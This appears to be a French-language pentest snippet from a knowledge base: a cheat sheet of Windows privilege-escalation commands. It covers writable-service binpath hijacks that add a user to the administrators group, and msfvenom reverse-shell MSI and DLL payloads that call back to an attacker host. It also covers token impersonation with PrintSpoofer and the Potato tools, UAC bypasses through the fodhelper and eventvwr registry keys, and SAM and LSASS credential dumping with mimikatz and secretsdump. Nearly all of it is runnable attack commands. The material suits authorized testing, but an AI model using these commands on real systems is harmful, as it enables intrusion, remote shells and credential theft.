--- title: "Privilege Escalation Windows" domain: security subdomain: pentest phase: 05-post-exploitation type: snippet tags: [privesc, windows, uac, token, alwaysinstallelevated] difficulty: advanced status: stable updated: "2025-05-10" --- ## Énumération automatique ```bash # WinPEAS .\winPEASx64.exe # PowerUp (PowerSploit) Import-Module .\PowerUp.ps1 Invoke-AllChecks # Seatbelt .\Seatbelt.exe -group=all ``` ## Informations système ```bash systeminfo whoami /all net user net localgroup administrators ``` ## Services vulnérables ```bash # Services modifiables sc qc {{SERVICE_NAME}} accesschk.exe -uwcqv "Authenticated Users" * # Modifier le binaire path sc config {{SERVICE_NAME}} binpath= "cmd.exe /c net localgroup administrators {{USER}} /add" sc stop {{SERVICE_NAME}} sc start {{SERVICE_NAME}} # Unquoted service path wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "C:\Windows" ``` ## AlwaysInstallElevated ```bash # Vérifier les clés registry reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated # Si les deux = 1, générer un MSI malveillant : msfvenom -p windows/x64/shell_reverse_tcp LHOST={{LHOST}} LPORT={{LPORT}} -f msi -o shell.msi # Exécuter côté cible : msiexec /quiet /qn /i C:\Temp\shell.msi ``` ## Token Impersonation ```bash # Dans meterpreter : use incognito list_tokens -u impersonate_token "NT AUTHORITY\\SYSTEM" # PrintSpoofer (SeImpersonatePrivilege) .\PrintSpoofer64.exe -i -c cmd # Juicy Potato (Windows < 2019) .\JuicyPotato.exe -l {{LPORT}} -p cmd.exe -t * -c {clsid} # GodPotato .\GodPotato-NET4.exe -cmd "cmd /c whoami" ``` ## UAC Bypass ```bash # Fodhelper bypass New-Item "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Force New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "DelegateExecute" -Value "" -Force Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "(default)" -Value "cmd /c start cmd.exe" -Force Start-Process "C:\Windows\System32\fodhelper.exe" -WindowStyle Hidden # Eventvwr bypass $cmd = "cmd /c start cmd.exe" New-Item "HKCU:\Software\Classes\mscfile\shell\open\command" -Force Set-ItemProperty "HKCU:\Software\Classes\mscfile\shell\open\command" "(default)" $cmd Start-Process "eventvwr.exe" ``` ## DLL Hijacking ```bash # Trouver des DLL manquantes procmon.exe # filtrer sur "NAME NOT FOUND" + ".dll" # Générer une DLL malveillante msfvenom -p windows/x64/shell_reverse_tcp LHOST={{LHOST}} LPORT={{LPORT}} -f dll -o hijack.dll # Copier dans le répertoire writable copy hijack.dll C:\Program Files\{{APP}}\missing.dll ``` ## Credentials stockés ```bash # Windows Credential Manager cmdkey /list # Utiliser les creds stockés runas /savecred /user:{{DOMAIN}}\{{USER}} cmd.exe # SAM dump (si SYSTEM) reg save HKLM\SAM C:\Temp\SAM reg save HKLM\SYSTEM C:\Temp\SYSTEM # Côté attaquant : python3 impacket/secretsdump.py -sam SAM -system SYSTEM LOCAL # LSASS dump .\mimikatz.exe privilege::debug sekurlsa::logonpasswords # Task Scheduler creds schtasks /query /fo LIST /v | findstr /i "task\|run as" ``` ## Passwords dans les fichiers ```bash findstr /si password *.xml *.ini *.txt *.config 2>nul dir /s /b *pass* == *cred* == *vnc* == *.config* 2>nul ``` Les techniques d'élévation de privilèges laissent des traces dans les event logs Windows. Documenter chaque étape pour le rapport.